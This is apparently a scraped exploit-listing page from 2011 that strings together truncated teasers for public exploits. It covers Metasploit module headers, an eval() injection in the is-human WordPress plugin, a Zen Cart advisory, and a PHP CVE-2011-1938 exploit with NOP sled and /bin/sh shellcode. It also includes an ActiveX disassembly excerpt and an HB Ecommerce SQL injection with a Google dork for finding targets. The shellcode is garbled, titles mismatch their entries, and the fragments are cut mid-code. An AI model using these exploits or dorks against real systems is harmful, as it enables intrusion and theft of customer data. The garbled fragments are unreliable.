[webapps / 0day] – Glasstree <= SQL Injection Vulnerability
##
# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
[...]
# Exploit Title: is-human (1.4.2 and prior) WordPress plugin.
# Date: 16.05.2011
# Author: neworder [www.neworder-ind.net]
# Software Link: http://wordpress.org/extend/plugins/is-human/
# Version: 1.4.2
# Tested on: Linux Platform
The vulnerability exists in /is-human/engine.php.
It is possible to take control of the eval() function via the ‘type’ parameter,
when the ‘action’ is set to log-reset. From here we can run our own code.
In [...]
Trade Line Web <= Remote ‘id’ Funcs SQL-i Vulnerabilities
[*]==================================================================>
[*]
[*] Multiple Vulnerabilities in Zen Cart
[*]
[*] [ Vendor SW ] => Zen Cart – http://www.zen-cart.com
[*] [ Version ] => 1.3.9f, 1.3.9h (but possibly all versions)
[*] [ Vendor URL ] => www.zen-cart.com
[*] [ Tested on [...]
<?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go...\n";
define('EVIL_SPACE_ADDR', "\xff\xff\xee\xb3");
define('EVIL_SPACE_SIZE', 1024*1024*8);
$SHELLCODE =
"x6ax31×58×99xcdx80×89xc3×89xc1×6ax46×58xcdx80xb0".
"x0bx52×68×6ex2fx73×68×68×2fx2fx62×69×89xe3×89xd1".
"xcdx80";
echo "[+] creating the sled.\n";
$CODE = str_repeat("\x90", EVIL_SPACE_SIZE);
for ($i = 0, [...]
##
# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
[...]
Magneto ICMP ActiveX v4.0.0.20 ICMPSendEchoRequest Remote Code Execute
Date: 2011-5-27
Discovered by: boahat
vendor: http://www.magnetosoft.com/
Download: http://www.magnetosoft.com/downloads/skicmp_setup.exe
SKIcmp.ocx
Function ICMPSendEchoRequest (
ByVal bstrDestinationAddress As String
) As Long
.text:1000F012 mov edx, [ebx+8] // edx can be controlled
.text:1000F015 [...]
————-[ HB ECOMMERCE SQL Injection Vulnerability ]—————
————————————————————————
————————————————————————
[+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ]
[+] Google Dork: intext:’supplied by hb ecommerce’
[+] Date: 26.05.2011
[+] Author: takeshix
[+] Author Contact: takeshix@safe-mail.net
[+] Software Link: http://www.hbecommerce.co.uk/
[+] Tested on: Debian GNU/Linux Testing(Wheezy) x64
[+] System: PHP
————————————————————————
————————————————————————
Vulnerable URL:
/templates1/view_product.php?product=
Example:
http://localhost/templates1/view_product.php?product=[SQL INJECTION]
Get a mail from the Customers table:
note: customer passwords dumped in plaintext!
————————————————————————
————————————————————————
Greez to: esc0bar [...]